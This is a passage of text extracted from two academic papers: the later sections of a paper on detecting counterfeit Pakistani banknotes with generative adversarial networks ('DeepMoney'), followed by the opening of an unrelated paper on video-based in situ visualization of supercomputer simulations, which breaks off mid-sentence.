links from any previous or top layer. A lower layer represents a data vector. An example of Deep Belief Networks is depicted in Fig. 3: Long short-term memory The connected neural network, also called the recurrent neural network, works but, when applied on different models, it suffers from two problems. Firstly, it produces a vanishing gradient and, secondly, it is an exploding gradient. LTSM (long short term memory) was invented to solve these issues by introducing a memory unit, which is called a cell, into the network. The cell is used as storage or memory that basically remembers a value for long or possibly short time periods (Hochreiter & Schmidhuber, 1997; Sak, Senior & Beaufays, 2014; Warrington & Baddeley, 2017). LSTM are represented in Fig. 4. Problem statement The existing solutions only work to detect the security features of the notes and at present this is the only viable solution used to tackle this issue. Forged notes are not detectable by the naked eye and this results in financial loss to the general public. Degraded bank notes are also in circulation which may result in usage problems. The solution given in this paper is based on Generative Adversarial Networks (GANs) (Goodfellow et al., 2014) that use generative and discriminative models for the recognition of real and counterfeit currency notes. To the best of our knowledge, this is first research being done to detect forged money using GANs. We trained the discriminative model with Pakistani rupee notes while the Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 7/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-3 http://dx.doi.org/10.7717/peerj-cs.216 Figure 4 Long short-term memory. Full-size DOI: 10.7717/peerjcs.216/fig-4 generative model G was used to input the counterfeit notes to classify with discriminative model D. The objectives of the studies is twofold: 1. To build a dataset of real and counterfeit Pakistani currency which is not available at present in the public domain; 2. To present, design, and implement DeepMoney, a method to differentiate counterfeit notes from genuine bank notes. PROPOSED SOLUTION In this section, the proposed solution is elaborated and details are provided as to how Generative Adversarial Networks cope with real and fake data. Generative adversarial networks A very new and effective Generative Model is utilized for generative counterfeit samples and for recognizing original data items from the generative ones, known as Generative Adversarial Networks (GANs) (Goodfellow et al., 2014; Goodfellow et al., 2016; Radford, Metz & Chintala, 2015; Salimans et al., 2016). GANs can differentiate with maximum accuracy between the fake and real banknotes. GANs are quite interesting phenomena of neural networks that work on two modules. One is called the generative network and the second is known as the discriminator network. Quite promising results have been achieved after employing GANs on the dataset and then subsequently used to classify the real and fake notes. The proposed model is depicted in Fig. 5 wherein the Discriminator Neural Network (D) is trained by providing data from training set (original distribution) and generated data (after perturbation i.e., adding noise from the latent space). The loss functions are updated during training process of each Discriminator’s network and the Generator Network (G). After training is completed, the model is able to classify real and fake currency notes with accuracy of 80 percent. In GANs, the discriminator part works as a classifier for recognizing the images. However, in the learning process, both the generator and discriminator co-ordinate with each other. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 8/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-4 http://dx.doi.org/10.7717/peerj-cs.216 Figure 5 DeepMoney: proposed counterfeit model. Full-size DOI: 10.7717/peerjcs.216/fig-5 A generated image is sent to the discriminator module to classify whether it is a fake or a real image. If it is recognizable, the discriminator will produce its output, if it is not, the module will send it back to the generator to regenerate the image. Based on the feedback received, the generator improves its cast and creates the image. The process continues until both the models are optimal in correctly generating and classifying the same image. In the case of currency note identification, the basic idea is that there are two models as defined by GANs. The generative model generates fake banknotes and the discriminative model D estimates the probability that whatever data is received from G, it is from training data or it is from generator G itself. To understand the generator’s distribution Pg over data (a), a priori is defined on input noise variables Pb(b), which then represents a mapping to the banknotes data space as G(b;θg ), where G is a differentiable function represented by a multilayer perceptron with parameters θg . According to GANs networks, a second multilayer perceptron was also designed D(y;θd) that outputs a single scalar. D(a) represents the banknotes that came from the data, not from the generator. The discriminator D was trained with real banknotes to increase the probability of correctly recognizing the Data(a) and the sample b was produced from the generative model G. The loss or energy function of generative model G can be represented mathematically as: 1 m m∑ 1 [log(1−(D(G(b))))] and the loss function of the Discriminator can be represented as: 1 m m∑ 1 [logD(a)+log(1−(D(G(b))))] Figure 5 shows a complete flow of how our DeepMoney process works. Real images are given as input to the discriminator, while for training, communication is performed between the discriminator and the generator. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 9/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-5 http://dx.doi.org/10.7717/peerj-cs.216 Figure 6 DeepMoney currency bill verification components. Full-size DOI: 10.7717/peerjcs.216/fig-6 Different components have been built to perform the verification of the currency note. Figure 6 shows the basic structure of the DeepMoney architecture, its actors, and the way they interact with each other. There is a single actor here, which is shown as the user. The user can input an image and request the authentication of the currency note. The system will respond through various other functions, as shown in Fig. 6. External systems may be used to receive assistance from the sensors if necessary. As DeepMoney progresses, other more appropriate features may be found and the use of these initial features may be minimized and other more versatile features may evolve. In this case, the ‘input image’ will remain the same but the dependent functionalities may change. Data preparation and augmentation Data collection and its preprocessing is carried out before training neural networks or deep learning models for subsequent recognition tasks. The following subsections provide the necessary details of how data is prepared and augmented with image datasets through the following function: datagen = ImageDataGenerator() Taking pictures and building a dataset is a laborious and time consuming task. An API specially designed for creating augmented image data is used which takes less time to augment the data and reduces memory overhead. ImageDataGenerator augments the data and when data has been created and configured then it is time to fit the data by calling the fit() function. Once the function is called on the data generator it is then passed in the training dataset. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 10/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-6 http://dx.doi.org/10.7717/peerj-cs.216 Figure 7 Input image. Full-size DOI: 10.7717/peerjcs.216/fig-7 datagen:fit(train) Data generator is an iterator and it returns the batches of image back when they have been requested. Xbatch;Ybatch=datagen : flow(train;train;batchsize=32) Finally, fitgenerator() is called with arguments of the desired length of epochs on which to train the data. The other one is the data generator. fitgenerator (datagen; samplesPerEpoch= len (train) ; epochs=100) There are many ways to configure the data preparation and its augmentation. These include, feature-wise standardization, ZCA whitening, random rotation, shifts, shear and ips, dimension reordering, saving augmented images to disk. All the functions/augmentation are performed by calling the ImageDataGenerator function. As a result of providing the input image as depicted in Fig. 7, the function ImageDataGenerator produces augmented data through incorporating the aforementioned features as shown in Fig. 8. Experimental setup The experiments are carried out on a GPU machine in FAST University with the following configuration. Keras is configured with Theano as backend. From the Keras library, the packages, Dense, Dropout, Activation, and Flatten layers are imported. The Dense layer is used to define filters with model parameters to identify various features of the currency notes. The Dropout layer is used to address overfitting and in order to ignore some of the features which are not contributing in identifying the actual features of the notes. The Activation function, ‘‘Relu’’ is used in order to represent the learned information in ranges of 0 and 1. The number of epochs and batch size is set to 100 and 32, respectively. To use the ImageDataGenerator function, Keras was utilized beside configuring scipy, numpy, h5py and pyyaml. Furthermore, a number of parameters were set for achieving augmentation which included: samplewise center, featurewise std normalization, ZCA Pesilon, ZCA whitening, rotation range, width shift range, height shift range, shear range, zoom range, channel shift, horizontal, vertical, and rescale. These are set to either, 0, 1 or in float values for the required changes. After specifying the parameters and storing the same in a datagen variable, the images were imported. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 11/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-7 http://dx.doi.org/10.7717/peerj-cs.216 Figure 8 Output images. Full-size DOI: 10.7717/peerjcs.216/fig-8 As specified by the 36 iterations, 36 images of the Bank Note with changes that were specified in the datagen will be produced and will be stored in the folder called preview. Implementation Comprehensive details are provided as to how the environment was set up for executing this project of GANs on the dataset. The first step involved the setup and configuration of the requirements that would help to execute the code. After running certain required scripts, GAN was trained on the DeepMoney dataset. Both the discriminator and the generator used a learning rate of 0.0002. The generator updated this twice for each update of the discriminator. This actually avoids the small discriminator loss. In the next step, results are produced and saved in PNG format. The class diagram in Fig. 9 represents the major classes of DeepMoney. As can be seen, the main controller class is InputImage and every other class is developed from that class. InputImage reads an image and passes that image to one of those classes, or to multiple classes, according to the requirement. The respective classes will then call their functions that may call another function of different classes. The sequence diagram in Fig. 10 shows the functions and their activities after they have been executed. As discussed earlier, functions may or may not call other functions of Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 12/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-8 http://dx.doi.org/10.7717/peerj-cs.216 Figure 9 Class Diagram for DeepMoney Architecture. Full-size DOI: 10.7717/peerjcs.216/fig-9 Figure 10 DeepMoney sequence diagram. Full-size DOI: 10.7717/peerjcs.216/fig-10 different classes if the task required is beyond their scope. The functions of other classes are called through instances of their respective class. The called function then returns the result to the parent function which, in turn, processes the user request. The algorithm for the GANs is provided in Fig. 11, while the algorithm for generating images is provide in Fig. 12 and the algorithm for augmentation is provided in Fig. 13. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 13/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-9 https://doi.org/10.7717/peerjcs.216/fig-10 http://dx.doi.org/10.7717/peerj-cs.216 Figure 11 Algorithm for generating currency notes. Full-size DOI: 10.7717/peerjcs.216/fig-11 Figure 12 Algorithm for generating currency notes. Full-size DOI: 10.7717/peerjcs.216/fig-12 Figure 13 Algorithm for generating currency notes. Full-size DOI: 10.7717/peerjcs.216/fig-13 RESULTS This section elaborates the results obtained through the experiments conducted on the DeepMoney dataset as depicted in Table 2. Moreover, a model evaluation is presented with the confusion matrix, supervised loss function, the generator and discriminator respective losses and finally the classification accuracy. Area Under the Curve (AUC) The trained model was able to achieve 80% accuracy in correctly classifying data. The Area Under the Curve (AUC)/Receiver Operating Characteristic (ROC) is presented in Fig. 14. Confusion matrix The confusion matrix consists of three classes along the x and y axis. Each row of the matrix represents each class along with the y-axis which shows its comparison with all the remaining classes. The classes belong to the DeepMoney dataset having images of Rs. 50, Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-11 https://doi.org/10.7717/peerjcs.216/fig-12 https://doi.org/10.7717/peerjcs.216/fig-13 http://dx.doi.org/10.7717/peerj-cs.216 Table 2 Experimental results. No. of Folds Accuracy Sensitivity Specificity Precision Kappa F1 Score ROC/AUC 5 76.8761% 0.7301 0.9771 0.7518 0.1283 0.7567 0.7598 10 79.5420% 0.7356 0.9783 0.7540 0.1854 0.7632 0.7745 15 73.9300% 0.7393 0.9798 0.7387 0.1767 0.7689 0.7965 Figure 14 DeepMoney area under curve. Full-size DOI: 10.7717/peerjcs.216/fig-14 Rs. 500, and Rs. 1000. Each class is assigned a unique density color. High intensity shades represent no confusion between classes while the lower intensity band represents confusion rates between the classes. In Fig. 15 the diagonal showing 1′s indicate that the confusion matrix calculation is near perfection. Supervised loss Cross-entropy was minimized for the multi-class softmax and for that purpose the labels were adjusted. A label mask in code was used to ignore the images that are unlabeled for the SS-learning problem. The TensorFlow graph visualization for the (percentage vs No. Epochs) are shown in Figs. 16–18. Total discriminator loss (TD Loss) Using the objective function of GANs, the Total Discriminator loss (TD-Loss) is brought down to 0.5. This helped to make the Discriminator more efficient in classification. The Tensorflow Graph Visualization below is pitted against (PercentageLoss No. Epochs) in Fig. 16. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-14 http://dx.doi.org/10.7717/peerj-cs.216 Figure 15 Confusion matrix calculation. Full-size DOI: 10.7717/peerjcs.216/fig-15 Figure 16 Discriminator loss graph visualization. Full-size DOI: 10.7717/peerjcs.216/fig-16 Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 16/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-15 https://doi.org/10.7717/peerjcs.216/fig-16 http://dx.doi.org/10.7717/peerj-cs.216 Figure 17 Generator loss graph visualization. Full-size DOI: 10.7717/peerjcs.216/fig-17 Figure 18 Classification accuracy graph visualization. Full-size DOI: 10.7717/peerjcs.216/fig-18 Generator loss (G Loss) Using the Objective function of GANs, the Generator’s loss (G loss) was brought up to (2.65), which can be seen in Fig. 17. This helped to make the Generator more robust in training the Discriminator. The Tensorflow Graph Visualization is visualised against (Percentage-Loss vs No. Epochs). Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 17/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-17 https://doi.org/10.7717/peerjcs.216/fig-18 http://dx.doi.org/10.7717/peerj-cs.216 Classification accuracy The Discriminator is trained to classify the unseen images and the efficiency of the same is measured in terms of correct classification. As can be seen in Fig. 18, a remarkable classification accuracy (80%) was achieved, which was made possible by training a Discriminator through DeepMoney dataset and Generator images. The Tensorflow Graph Visualization is depicted in Fig. 18 (Percentage Accuracy vs. No. Epochs). CONCLUSION Implementation of GANs models in the domain of computer vision has been proven to be effective. Upon testing in the currency originality, the discriminator model is seen as a viable contender in the classifier area. Additionally, classifier should be sufficiently trained with enough images by means of the real dataset and the generator module, especially in the Semi Supervised Generative Adversarial Networks (SSGANs). The dataset alteration can be performed in various other parametric tweaking with the Keras framework. 80% accuracy is achieved by the proposed GANs framework for counterfeit money detection; however, there is still room for improvement. As new generative models are created in the machine learning domain, DeepMoney can be tested upon these to achieve better and more effective results. Multi-class classifiers can be made good enough to result in improved accuracy. Classification is regarded to be at the forefront of machine learning, therefore, a better multi-class classifier would yield an even better retrospective score for the model. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Toqeer Ali conceived and designed the experiments, contributed reagents/materials/- analysis tools, approved the final draft. • Salman Jan conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Ahmad Alkhodre contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, proof-reading, other support. • Mohammad Nauman performed the experiments. • Muhammad Amin analyzed the data, performed the computation work. • Muhammad Shoaib Siddiqui dataset and Code. Data Availability The following information was supplied regarding data availability: Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.216 Ali, Toqeer; Jan, Salman (2019): DeepMoney: Counterfeit Money Detection Using Generative Adversarial Networks. figshare. Dataset. https://doi.org/10.6084/m9.figshare. 9164510.v3. REFERENCES Abburu V, Gupta S, Rimitha SR, Mulimani M, Koolagudi SG. 2017. Currency recogni- tion system using image processing. In: Contemporary computing (IC3), 2017 tenth international conference on. Piscataway: IEEE, 1–6. Alicherry M. 2017. Verifying authenticity of currency and tracking duplicates. Technical Disclosure Commons. Available at https://www.tdcommons.org/cgi/viewcontent.cgi? article=1625&context=dpubs_series. Bartkiewicz K, Černoch A, Chimczak G, Lemr K, Miranowicz A, Nori F. 2017. Exper- imental quantum forgery of quantum optical money. npj Quantum Information 3:1–7 DOI 10.1038/s41534-017-0010-x. Berenguel A, Terrades OR, Lladós J, Cañero C. 2016. Banknote counterfeit detection through background texture printing analysis. In: Document analysis systems (DAS), 2016 12th IAPR workshop on. Piscataway: IEEE, 66–71. Chakraborty K, Basumatary J, Dasgupta D, Kalita JC, Mukherjee S. 2013. Recent developments in paper currency recognition system. International Journal of Research in Engineering and Technology 2:222–226 DOI 10.15623/ijret.2013.0211034. Choi W-J, Min G-H, Lee B-H, Eom J-H, Kim J-W. 2010. Counterfeit detection using characterization of safety feature on banknote with full-field optical co- herence tomography. Journal of the Optical Society of Korea 14(4):316–320 DOI 10.3807/JOSK.2010.14.4.316. Derrida J. 1994. Given time: I. Counterfeit money, volume 1. Chicago: University of Chicago Press. Goodfellow I, Bengio Y, Courville A, Bengio Y. 2016. Deep learning, volume 1. Cam- bridge: MIT Press. Goodfellow I, Pouget-Abadie J, Mirza M, Xu B, Warde-Farley D, Ozair S, Courville A, Bengio Y. 2014. Generative adversarial nets. In: International conference on advances in neural information processing systems. Cambridge: MIT Press, 2672–2680. Hassanpour H, Farahabadi PM. 2009. Using Hidden Markov Models for paper currency recognition. Expert Systems with Applications 36(6):10105–10111 DOI 10.1016/j.eswa.2009.01.057. Hochreiter S, Schmidhuber J. 1997. Long short-term memory. Neural Computation 9(8):1735–1780 DOI 10.1162/neco.1997.9.8.1735. Kang K, Lee C. 2016. Fake banknote detection using multispectral images. In: Informa- tion, intelligence, systems & applications (IISA), 2016 7th international conference on. Piscataway: IEEE, 1–3. Kayani S. 2017. A bank note processing system having a combined florescence and phosphorescence detection system. US Patent 9,761,077. Available at https://patents. justia.com/patent/9505571 (accessed on 1 February 2018). Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 19/21 https://peerj.com https://doi.org/10.6084/m9.figshare.9164510.v3 https://doi.org/10.6084/m9.figshare.9164510.v3 https://www.tdcommons.org/cgi/viewcontent.cgi?article=1625&context=dpubs_series https://www.tdcommons.org/cgi/viewcontent.cgi?article=1625&context=dpubs_series http://dx.doi.org/10.1038/s41534-017-0010-x http://dx.doi.org/10.15623/ijret.2013.0211034 http://dx.doi.org/10.3807/JOSK.2010.14.4.316 http://dx.doi.org/10.1016/j.eswa.2009.01.057 http://dx.doi.org/10.1162/neco.1997.9.8.1735 https://patents.justia.com/patent/9505571 https://patents.justia.com/patent/9505571 http://dx.doi.org/10.7717/peerj-cs.216 Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep con- volutional neural networks. In: Advances in neural information processing systems. 1097–1105. Lee H, Pham P, Largman Y, Ng AY. 2009. Unsupervised feature learning for audio classification using convolutional deep belief networks. In: Advances in neural information processing systems. 1096–1104. Magdaleno A. 2016. Woman pleads guilty for printing thousands of money as fake. Mashable. Available at http://on.mash.to/2lUZvZV (accessed on 1 January 2018). Micali S, Devadas S. 2017. Counterfeit prevention. US Patent Application 15/522,348 (accessed on 1 February 2018). Mirza R, Nanda V. 2012a. Design and implementation of indian paper currency authen- tication system based on feature extraction by edge based segmentation using Sobel operator. International Journal of Engineering Research and Development 3(2):41–46. Mirza R, Nanda V. 2012b. Paper currency verification system based on characteristic extraction using image processing. International Journal of Engineering and Advanced Technology (IJEAT) 1(3):68–71. Mohamad NS, Hussin B, Shibghatullah AS, Basari A. 2014. Banknote authentication using artificial neural network. Science International 26(5):1865–1868. Murakami-Fester A. 2016. Counterfiet cases in US. USA Today. Available at https: //www.usatoday.com/story/money/personalfinance/2016/10/23/counterfeit-money- spot-fake/92080738/ (accessed on 1 January 2018). Phillips R. 2018. Miniaturized Counterfeit Detector. US Patent Application 15/817,848. Available at http://www.freepatentsonline.com/y2018/0165906.html (accessed on 1 February 2018). Prasanthi BS, Setty DR. 2015. Indian paper currency authentication system using image processing. International Journal of Research in Engineering and Technology 4:973–981. Radford A, Metz L, Chintala S. 2015. Unsupervised representation learning with deep convolutional generative adversarial networks. ArXiv preprint. arXiv:1511.06434. Ross DJ, Elmenhurst BJ, Tocci M, Forbes J, Ross HW. 2016. Database for detecting counterfeit items using digital fingerprint records. US Patent Application 15/208,339. Available at https://patents.google.com/patent/US20160335520A1/en (accessed on 1 February 2018). Sak H, Senior A, Beaufays F. 2014. Long short-term memory recurrent neural network architectures for large scale acoustic modeling. In: Fifteenth annual conference of the international speech communication association. Salimans T, Goodfellow I, Zaremba W, Cheung V, Radford A, Chen X. 2016. Improved techniques for training gans. In: Advances in neural information processing systems. 2234–2242. Shoaib M, Ilyas M, Khiyal M, Hayat S. 2013. Official digital currency. In: Digital infor- mation management (ICDIM), 2013 eighth international conference on. Piscataway: IEEE, 346–352. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 20/21 https://peerj.com http://on.mash.to/2lUZvZV https://www.usatoday.com/story/money/personalfinance/2016/10/23/counterfeit-money-spot-fake/92080738/ https://www.usatoday.com/story/money/personalfinance/2016/10/23/counterfeit-money-spot-fake/92080738/ https://www.usatoday.com/story/money/personalfinance/2016/10/23/counterfeit-money-spot-fake/92080738/ http://www.freepatentsonline.com/y2018/0165906.html http://arXiv.org/abs/1511.06434 https://patents.google.com/patent/US20160335520A1/en http://dx.doi.org/10.7717/peerj-cs.216 Singh M, Ozarde P, Abhiram K. 2018. Image processing based detection of counterfeit Indian Bank notes. In: 9th international conference on computing, communication and networking technologies. 1–5. Snehlata , Saxena V. 2017. Identification of fake currency: a case study of Indian sce- nario. International Journal of Advanced Research in Computer Science 8(3):213–218. Taillard M. 2018. Counterfeiting. In: Economics and modern warfare. New York: Palgrave Macmillan, 153–157. Tanaka T, Nishiyama S, Koyama M. 1996. Method for making an anti-counterfeit latent image formation object for bills, credit cards, etc. US Patent 5582103A issued December 10, 1996. Available at https://patents.google.com/patent/US5582103A/en. Thakur M, Kaur A. 2014. Various fake currency detection techniques. International Journal for Technological Research in Engineering 1(11):1309–1313. Warrington E, Baddeley A. 2017. Amnesia and the distinction between long-and short- term memory 1. In: Exploring working memory. New York: Routledge, 18–38. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 21/21 https://peerj.com https://patents.google.com/patent/US5582103A/en http://dx.doi.org/10.7717/peerj-cs.216 work_znxqek43rrc75ooytxtbi73bom ---- 4D street view: a video-based visualization method 4D street view: a video-based visualization method Akira Kageyama and Naohisa Sakamoto Graduate School of System Informatics, Kobe University, Kobe, Japan ABSTRACT We propose a new visualization method for massive supercomputer simulations. The key idea is to scatter multiple omnidirectional cameras to record the simulation via in situ visualization. After the simulations are complete, researchers can interactively explore the data collection of the recorded videos by navigating along a path in four-dimensional spacetime. We demonstrate the feasibility of this method by applying it to three different fluid and magnetohydrodynamics simulations using up to 1,000 omnidirectional cameras. Subjects Scientific Computing and Simulation, Visual Analytics Keywords Scientific visualization, High performance computing, Computer simulation, In situ visualization, Video-based visualization, Omnidirectional visualization, Multi-viewpoint visualization, Interactive exploration of video dataset, New method for visualization of supercomputer simulations INTRODUCTION Visualization is indispensable to comprehend the time development of complex phenomena captured as numerical data by supercomputer simulations. For three- dimensional (3D) fluid flow simulations, for example, pressure, velocity, vorticity, and other 3D fields are saved for post-hoc exploratory visualization. It is commonplace to save 3D fields without thinning out to maintain the spatial resolution of the simulation. In contrast, it is uncommon to store 3D fields without thinning them out in the temporal dimension, and the 3D data are usually output after very long intervals of time. If one attempts to save all the 3D fields within very short intervals, the numerical data will flood the disk space of the supercomputer system. The temporal thinning before the visualization often necessitates the discarding of valuable information. This situation will not improve in the future, but will most likely worsen as supercomputer technology advances. We overcome the above-mentioned problems using our new in situ visualization method, wherein visual recordings are made using the supercomputer system during simulation. Because the recorded images are two-dimensional (2D), the data size is naturally smaller—a compression of the raw 3D data whereof the image is produced. In addition, lossless compression algorithms based on arithmetic coding are also available to reduce the size of the recordings even further. In situ visualization already plays an essential role in large-scale simulations (Ma et al., 2007; Ross et al., 2008; Ma, 2009; Childs et al., 2012). Major application programs for general-purpose visualization are now armed with in situ libraries or tools, such as Catalyst (Ayachit et al., 2015) for ParaView and libsim (Whitlock, Favre & Meredith, 2011) for How to cite this article Kageyama A, Sakamoto N. 2020. 4D street view: a video-based visualization method. PeerJ Comput. Sci. 6:e305 DOI 10.7717/peerj-cs.305 Submitted 29 April 2020 Accepted 29 September 2020 Published 9 November 2020 Corresponding author Akira Kageyama, kage@port.kobe-u.ac.jp Academic editor Gang Mei Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.305 Copyright 2020 Kageyama and Sakamoto Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.305 mailto:kage@�port.�kobe-u.�ac.�jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.305 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ VisIt. These applications have been developed based on Visualization Tool Kit (VTK) (Schroeder, Martin & Lorensen, 2006). OpenGL is used for hardware-accelerated rendering in VTK when the graphics processing unit (GPU) is available. For a supercomputer system without GPUs, OpenGL functions can be executed using OSMesa. Software optimization technology, such as SIMD extension instructions for software rasterization processing, are included in OSMesa. Based on those technologies, a high-quality rendering framework, such as Embree (Wald et al., 2014) and OSPray (Wald et al., 2017), capable of executing rendering processing at high speeds have been developed. To execute the in situ visualization process efficiently on the supercomputing system, an adaptable data I/O framework called as ADIOS (Lofstead et al., 2008) has been developed. ADIOS provides a simple and flexible approach for data transmission, including asynchronous communication between the simulation and visualization processes (Wang et al., 2017; Kress et al., 2016). A generic in situ interface SENSEI (Ayachit et al., 2017) provides simulation researchers with portable interface for other in situ infrastructure such as Catalyst, libsim, and OSPray. A shortcoming of conventional in situ visualizations is that they deprive users of interactive control. Here, interactive control means that users can, in real time, change visualization-related settings, such as the viewing position and direction. The interactivity also includes the capability to change the visualization method (e.g., from isosurface to volume rendering) applied to the target data and to tune the related parameters. In the conventional in situ visualization method, one has to resubmit the same simulation job to obtain a different visualization setting, for example, volume renderings from a different point of view. There are several proposals to incorporate the interactivity into in situ visualization. Kawamura, Noda & Idomura (2016) developed an in situ visualization method that is an extension of the particle-based rendering method (Sakamoto et al., 2007) to the concurrent in situ visualization. In the particle-based rendering method, a dataset, represented as a set of particles, is produced by simulation. The particle dataset, whose size is much smaller than the raw numerical data, is transmitted to computer system for visualization with GPUs and interactively visualized. Tikhonova, Correa & Ma (2010a) and Tikhonova, Correa & Ma (2010b) proposed “proxy image” method to realize interactive volume rendering by making use of intermediate representation of the data. This method was extended to the in situ visualization by Ye, Miller & Ma (2013). Matthes et al. (2016) developed in situ library ISAAC for supercomputer simulations, by which users can interactively analyze data without the deep copy. In our previous article (Kageyama & Yamada, 2014), we proposed an interactive in situ visualization method, in which we place visualization cameras on a spherical surface that covered the target region, as is schematically shown by the small circles in Fig. 1A. The simulation results are rendered with several visualization methods and parameters from the multiple viewpoints in the 3D space. Because the cameras focus on a point in the simulation region, as suggested by the arrows in the figure, we can observe the structures and dynamics in the simulation from various directions. The sequence of images are complied as videos that are indexed with the camera locations, before applying Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 2/23 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ interactive analysis of the video collection with dedicated exploratory visualization software. This method can be regarded as an application of the image-based rendering (Shum & Kang, 2000) in computer graphics to the scientific visualization. In the image-based rendering, an image viewed from a specified point is calculated from images taken from different view points. Among various approaches to image-based rendering, our approach is closer to “light field rendering” (Levoy & Hanrahan, 1996), where new images are generated only through the image, not through the geometry data. Ahrens et al. (2014) also developed the image-based in situ visualization method and implemented as Cinema viewer, which is applied to various simulations (O’Leary et al., 2016; Banesh et al., 2017). Because in situ visualization can produce a large number of images at fine time intervals, it is natural to save the sequence of images taken from a single camera as a single video file. A video file has an advantage over still images, that is, we can apply advanced video compression technology to it. The small storage requirement of a compressed video file allows us to save a large number of them (Berres et al., 2017), within the same disk space for storing raw numerical data. Therefore, we can set numerous visualization cameras with different visualization settings. An increased number of video capturing virtual cameras implies an increased usage of the supercomputing resources, besides those necessary for the simulation. However, we note that it is not uncommon that only a portion of the available computing resources are utilized by a single simulation, even when the simulation code is highly optimized. In other words, the computing resource capacity of today’s supercomputer system is much larger than is being utilized by simulations. Thus, it would be quite appropriate to use surplus processor cores for our in situ visualization. A natural extension of our previous approach (Kageyama & Yamada, 2014) is to place the visualization cameras all over the simulation region, that is, not only around it but also inside the region, as is schematically shown by the small circles in Fig. 1B. An apparent problem in this 3D distribution of the visualization cameras is that we cannot specify the view-direction of each camera when we have no a priori knowledge of the locations to be focused on. To resolve this problem, we propose in this article to use omnidirectional visualization cameras that have the full (=4p steradian) solid view angle, as suggested by the arrows in Fig. 1B. If we could scatter such cameras all over the simulation region, almost all, if not all, occurring phenomena would be recorded by some nearby cameras. Figure 2 schematically shows the concept of the proposed method. We place lots of omnidirectional cameras (blue spheres in Fig. 2A). Each camera produces a sequence of omnidirectional images, and we store them as a video file. When we place C cameras and apply V kinds of visualizations on each of them, we obtain C × V video files in total as a result of simulation (Fig. 2B). After the simulation, it is possible to pick up one or more of the video files and play it on a PC with a commonly available video player. Although, the displayed images are distorted because they are captured by omnidirectional cameras. Supposing that the picked-up video is recorded by the c-th camera (0 ≤ c < C) for the v-th visualization Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 3/23 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ method (0 ≤ v < V), herein referred to as movc,v, what the common video player does is to extract the sequence of images in movc,v and presents them on the PC’s screen one after another. In the “Virtual Museum” by Miller et al. (1992), the viewer interactively specifies the video to be played at one time. An important function in our method is that we extract a sequence of still images from different video files, such as movc1,v, movc2,v, movc3,v, ⋯, as denoted by the magenta arrows connecting Figs. 2A and 2B. The extracted sequence of Figure 1 Visualization cameras (small white circles) and simulation boundary (rectangle). (A) In our previous article (Kageyama & Yamada, 2014), we placed the cameras on a spherical surface around the simulation region. Arrows represent the viewing direction. All the cameras are focusing on a point in the simulation region. (B) In the present article, we propose to place omnidirectional cameras all over the simulation space. Each camera records the full solid view angle. Full-size DOI: 10.7717/peerj-cs.305/fig-1 Figure 2 Concept of 4D street view. (A) We place lots of omnidirectional cameras (blue spheres) in the simulation space and apply in situ visualization with them. (B) Each camera records the time develop- ment of the simulation viewed from its position with 4p steradian and the omnidirectional images are compiled as a video. The video files are tied with the position data, and they constitute a video data collection. (C) A dedicated application program extracts a sequence of images from the video data collection as a smooth (regular, not omnidirectional) video on a PC window. The user interactively specifies the position, direction, and time (or frame) to extract images from the data collection. Full-size DOI: 10.7717/peerj-cs.305/fig-2 Kageyama and Sakamoto (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.305 4/23 http://dx.doi.org/10.7717/peerj-cs.305/fig-1 http://dx.doi.org/10.7717/peerj-cs.305/fig-2 http://dx.doi.org/10.7717/peerj-cs.305 https://peerj.com/computer-science/ the images is presented as a video by a dedicated application program (see Fig. 2C). The program excerpts a partial field-of-view around a user-specified direction from the omnidirectional image. The user’s experience is similar to walking around a specific region of interest. We can also switch the currently applied visualization method, for instance, from va to vb, by exchanging the input video file from movc,va to movc,vb. This switching experience is almost the same as that of standard post-hoc visualizations. The difference, however, being that the exchange 